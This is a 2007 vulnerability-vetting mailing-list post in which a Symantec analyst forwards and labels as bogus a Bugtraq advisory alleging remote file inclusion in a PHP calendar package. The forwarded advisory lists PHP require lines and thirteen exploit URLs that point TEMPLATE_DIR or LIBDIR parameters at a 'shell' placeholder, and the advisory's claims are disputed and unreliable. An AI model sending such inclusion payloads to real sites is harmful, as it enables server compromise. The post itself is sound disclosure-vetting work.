[VIM] [bogus] [trzindan at hotmail.fr: local Calendar System v1.1 (lcStdLib.inc) Remote File Include] (fwd)
rkeith at securityfocus.com
rkeith at securityfocus.com
Sat Jan 27 15:38:36 EST 2007
Every single script has the first line as:
include("./config.php");
That file clearly defines the parameters with hardcoded data.
--
Rob Keith
Symantec
---- Forwarded message from trzindan at hotmail.fr -----
From: trzindan at hotmail.fr
Subject: local Calendar System v1.1 (lcStdLib.inc) Remote File Include
To: bugtraq at securityfocus.com
Date: 27 Jan 2007 17:46:55 -0000
X-Mailer: MIME-tools 5.411 (Entity 5.404)
Message-ID: <20070127174655.27269.qmail at securityfocus.com>
+-------------------------------------------------------------------------------------------
local Calendar System v1.1 (lcStdLib.inc) Remote File Include
Tr_ZiNDaN
trzindan at hotmail.fr Turkey
--------------------------------------------------------------------------------------------
download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz
--------------------------------------------------------------------------------------------
code :
require "$TEMPLATE_DIR/header.inc";
require("$LIBDIR/lcStdLib.inc");
require("$LIBDIR/lcUser.php");
require ("$LIBDIR/lcGroup.inc");
require("$LIBDIR/lcCal.inc");
require("$LIBDIR/Calendar.inc");
require("$LIBDIR/lcErrorChecker.inc");
include ("$TEMPLATE_DIR/navbar.php");
include("$TEMPLATE_DIR/footer.inc");
--------------------------------------------------------------------------------------------
exploit:
local/showinvoices.php?TEMPLATE_DIR=shell?
local/editevent.php?LIBDIR=shell?
local/resetpassword.php?LIBDIR=shell?
local/signup.php?LIBDIR=shell?
local/showmonth.php?TEMPLATE_DIR=shell?
local/showmonth.php?LIBDIR=shell?
local/showday.php?LIBDIR=shell?
local/showevents.php?LIBDIR=shell?
local/showevents.php?TEMPLATE_DIR=shell?
local/retrieveinvoice.php?TEMPLATE_DIR=shell?
local/modifyitem.php?TEMPLATE_DIR=shell?
local/lookup_userid.php?LIBDIR=shell?
local/lookup_userid.php?TEMPLATE_DIR=shell?
--------------------------------------------------------------------------
Thanx
str0ke,EL_MuHaMMeD,Crackers_Child,H0tturk,EntriKa,XYU,E-system,RedWorm
Blackwolf,Mefisto,M3rhametsiz,Paradox_,Sehzade,Volqan,Arslan,KurtEfendy..
-------------------------------------------------------------------------
##---ALL MusLim
Hackers------------------------------------------------------------------------------------------------
----- End forwarded message ---
More information about the VIM
mailing list